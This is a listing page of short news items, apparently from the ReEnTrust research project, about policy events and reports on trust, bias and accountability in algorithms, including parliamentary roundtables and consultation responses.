On 24th May, the APPG on Data Analytics hosted a roundtable on rebuilding trust in algorithms, in collaboration with the EPSRC ReEnTrust project. Speaking at the event were: Daniel Zeichner MP, Chair of the APGDA (Labour); Professor Tom Rodden, Chief Scientific Advisor, DCMS; Professor Marina Jirotka, Oxford University; and Jonathan Legh-Smith, Head of Scientific Affairs at BT Group. Professor Rodden noted the critical need to link in with…
APGDA and ReEnTrust host webinar on rebuilding and enhancing trust in algorithms
On Wednesday 2nd December 2020, the All-Party Parliamentary Group on Data Analytics and the ReEnTrust project were delighted to host an online briefing on rebuilding and enhancing trust in algorithms. The event was chaired by APGDA Chair Daniel Zeichner MP and included contributions from a number of senior researchers from the ReEnTrust project, following the publication of their recent policy paper. Mr Zeichner opened the meeting at 11am and presented an…
ReEnTrust Team Respond to ICO’s Consultation on Explaining AI
On 24 January, the ReEnTrust team, led by Dr Philip Inglesant, provided input to the ICO and The Alan Turing Institute's latest consultation on Explaining AI. ReEnTrust has two interests in AI-enabled decisions: in our own research, to ensure that our own processes are trustworthy, compliant with the GDPR and the DPA, and transparent and responsible in our research involving people; and, with respect to the topic of our research, to facilitate trust-building by users in algorithm-driven online systems. We…
Purdue Policies for Progress
On May 20th, the Purdue Policy Research Centre at Purdue University held its “Policies for Progress” conference, exploring ways to bring together policymakers, industry leaders, not-for-profits, and academics to bring their collective expertise to…
Landscape summary for CDEI: bias in algorithmic decision-making
Publication of the landscape summary on “Bias in Algorithmic Decision-Making”, commissioned by the Centre for Data Ethics and Innovation (CDEI) and produced by our own Michael Rovatsos, with contributions from Ansgar Koene and Brent Mittelstadt. The landscape summary report forms part of the CDEI’s reviews into online targeting and bias in algorithmic decision-making. These landscape summaries have informed the development of CDEI interim reports and will inform their ongoing…
Professor Marina Jirotka Involved in APGDA’s landmark report — Trust, Transparency, Tech
The All-Party Parliamentary Group on Data Analytics (APGDA) and Policy Connect launched their landmark report, Trust, Transparency, Tech, on data and technology ethics in the House of Commons on Tuesday 21st May 2019. Professor Marina Jirotka of the University of Oxford, PI of the ReEnTrust project, has been invited to join the steering committee behind the report. Over the next twelve months,…
Publication of European Parliament report on Algorithmic Accountability
In 2018, ReEnTrust team member Ansgar Koene, working on the UnBias project, was invited to produce a Science and Technology Options Assessment (STOA) report on “A Governance Framework for Algorithmic Accountability and Transparency” for the European Parliament. The report is now…
ReEnTrust engaging with policy discourse
The “responsible policy and practice” work-package (WP1) of ReEnTrust aims to unpack the tensions between the drive for innovation in the design and use of algorithms and the growing desire for meaningful regulation and protection for users. As part of this work, ReEnTrust is engaging with the policy discourse on algorithmic regulation through participation in “AI governance” conferences and working with policy-setting organizations. In the first three months…